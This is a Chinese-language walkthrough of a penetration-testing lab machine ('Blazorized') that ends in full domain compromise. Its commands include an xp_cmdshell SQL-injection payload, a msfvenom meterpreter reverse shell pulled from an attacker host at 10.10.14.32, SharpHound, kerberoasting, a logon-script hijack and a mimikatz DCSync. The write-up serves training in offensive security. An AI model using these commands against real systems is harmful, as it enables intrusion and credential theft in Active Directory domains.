信息收集:
暴露的服务汇总:
DNS 服务 (53/tcp)HTTP 服务 (80/tcp)Kerberos (88/tcp)RPC 与 NetBIOS (135/tcp, 139/tcp, 445/tcp)LDAP 和 Active Directory (389/tcp, 3268/tcp)MS-SQL (1433/tcp)未指定服务 (464/tcp, 593/tcp, 636/tcp, 3269/tcp)
由Kerberos和LDAP服务可推断出该机器是一台域控。
先看Web:
fuzz出admin子域(-fc 过滤返回状态码):
打开时管理员登录页面:
寻找凭据:
有个检查更新页面,可以模拟管理员身份调用api获取帖子和类别的更新:
抓包看看,发现有管理员的JWT:
但是不知道签名。继续观察流量,在Blazor应用程序的启动配置文件接口中发现了代码库资源列表:
把与Blazor应用相关的下面四个dll下载下来分析:
Blazored.LocalStorage.dllBlazorized.DigitalGarden.dllBlazorized.Shared.dllBlazorized.Helpers.dll
得到JWT签名:
拿到签名后随即伪造管理员的JWT Token,过期时间可设置长点:
修改下admin登录页面的 Local Storage:
进后台说明:后台功能不调用Api,直接与数据库通信:
靶机这种提示大概率是SQL注入了,找输入点发现搜索页面输入特殊字符没页面回显:
制作 xp_cmdshell 反弹shell:
搜索框输入payload:
'; EXEC master.dbo.xp_cmdshell 'powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand [base64-payload]' --+#弹回shell,也拿到了user flag:
换成msfvenom的马子:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.32 LPORT=9999 -f exe -o rev-9999.exemsf建立监听后,在靶机下载马子执行:
Invoke-WebRequest -Uri 'http://10.10.14.32:8088/rev-9999.exe' -OutFile 'C:UsersPublicrev-9999.exe'; Start-Process 'C:UsersPublicrev-9999.exe'上传SharpHound收集域内信息:
Invoke-WebRequest -Uri http://10.10.14.32:8088/SharpHound.exe -OutFile C:UsersPublicSharpHound.exe.SharpHound.exe -c All
我获取的 NU_1055 用户对RSA_4810用户具有WriteSPN权限,这里可进行SPN劫持。
通过修改 RSA_4810 的SPN,然后窃取该SPN的Kerberos服务票据:
使用john爆破密码,建议使用 --fork 启动多线程:
使用evil-winrm登录后,导入PowerView.ps1,搜索访问控制列表:
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RSA_4810"}
查看 SSA_6010 的域属性,发现可以修改SSA_6010的脚本路径,重写路径为加载反弹shell:
Get-ADUser -Identity SSA_6010 -Properties *Set-ADUser -Identity SSA_6010 -ScriptPath "A32FF3AEAA23revshell.bat"
同时观察 bloodhound 发现 SSA_6010 用户可以对管理员用户进行 DCSync 攻击(通过模拟域控制器从 Active Directory 中提取密码数据):
弹过来SSA_6010的shell之后获取其NTML哈希,使用evil-winrm登录后上传mimikatz获取administrator的NTLM哈希:
./mimikatz.exe -Command '"lsadump::dcsync /user:administrator"' exit
使用管理员身份登录,结束。
原文始发于微信公众号(KeepHack1ng):域渗透-Blazorized
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论